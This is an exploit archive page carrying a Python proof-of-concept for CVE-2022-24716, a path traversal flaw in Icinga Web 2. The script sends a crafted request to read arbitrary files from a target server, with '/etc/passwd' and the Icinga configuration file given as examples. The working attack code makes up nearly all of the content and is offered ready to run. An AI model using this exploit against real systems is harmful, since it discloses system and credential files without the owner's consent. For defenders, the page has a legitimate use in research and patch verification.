Icinga Web 2.10 Arbitrary File Disclosure

Icinga Web 2.10 Arbitrary File Disclosure: Posted Apr 10, 2023; Authored by Jacob Ebben; Icinga Web version 2.10 suffers from an arbitrary file disclosure vulnerability.; tags | exploit, web, arbitrary, info disclosure; advisories | CVE-2022-24716; SHA-256 | f08ad07b926f6cf095c8b7a80fc8a8658f60c610c96b25e695c50c6c4ae28f48; Download | Favorite | View

Icinga Web 2.10 Arbitrary File Disclosure

#!/usr/bin/env python3

# Exploit Title: Icinga Web 2.10 - Arbitrary File Disclosure
# Date: 2023-03-19
# Exploit Author: Jacob Ebben
# Vendor Homepage: https://icinga.com/
# Software Link: https://github.com/Icinga/icingaweb2
# Version: <2.8.6, <2.9.6, <2.10
# Tested on: Icinga Web 2 Version 2.9.2 on Linux
# CVE: CVE-2022-24716
# Based on: https://www.sonarsource.com/blog/path-traversal-vulnerabilities-in-icinga-web/

import argparse
import requests
from termcolor import colored

def print_message(message, type):
    if type == 'SUCCESS':
        print('[' + colored('SUCCESS', 'green') +  '] ' + message)
    elif type == 'INFO':
        print('[' + colored('INFO', 'blue') +  '] ' + message)
    elif type == 'WARNING':
        print('[' + colored('WARNING', 'yellow') +  '] ' + message)
    elif type == 'ALERT':
        print('[' + colored('ALERT', 'yellow') +  '] ' + message)
    elif type == 'ERROR':
        print('[' + colored('ERROR', 'red') +  '] ' + message)

def get_normalized_url(url):
    if url[-1] != '/':
        url += '/'
    if url[0:7].lower() != 'https://' and url[0:8].lower() != 'https://':
        url = "https://" + url
    return url

def get_proxy_protocol(url):
    if url[0:8].lower() == 'https://':
        return 'https'
    return 'http'

parser = argparse.ArgumentParser(description='Arbitrary File Disclosure Vulnerability in Icinga Web <2.8.6, <2.9.6, <2.10')
parser.add_argument('TARGET', type=str, 
                help='Target Icinga location (Example: https://localhost:8080/icinga2/ or https://victim.xyz/icinga/)')
parser.add_argument('FILE', type=str, 
                help='Filename to gather from exploit (Example: "/etc/passwd" or "/etc/icingaweb2/config.ini")')
parser.add_argument('-P','--proxy', type=str,
                help='HTTP proxy address (Example: https://127.0.0.1:8080/)')
args = parser.parse_args()

if args.proxy:
    proxy_url = get_normalized_url(args.proxy)
    proxy_protocol = get_proxy_protocol(proxy_url)
    proxies = { proxy_protocol: proxy_url }
else:
    proxies = {}

base_url = get_normalized_url(args.TARGET)
exploit_url = base_url + "lib/icinga/icinga-php-thirdparty" + args.FILE

request = requests.get(base_url, proxies=proxies)
if request.status_code == 404:
  print_message("Could not connect to provided URL!", "ERROR")
  exit()

request = requests.get(exploit_url, proxies=proxies)
file_content = request.text

print(file_content)

Top Authors In Last 30 Days

Red Hat 236 files
Ubuntu 56 files
Debian 19 files
LiquidWorm 16 files
Apple 9 files
Gentoo 5 files
Alter Prime 3 files
Google Security Research 3 files
Pierre Kim 2 files
EQSTLab 2 files

File Archives

Systems

AIX (430)
Apple (2,126)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,163)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,604)
HPUX (881)
iOS (393)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,945)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (17,337)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,987)
UNIX (9,475)
UnixWare (188)
Windows (6,784)
Other

Icinga Web 2.10 Arbitrary File Disclosure

Icinga Web 2.10 Arbitrary File Disclosure

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Icinga Web 2.10 Arbitrary File Disclosure

Share This

Icinga Web 2.10 Arbitrary File Disclosure

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems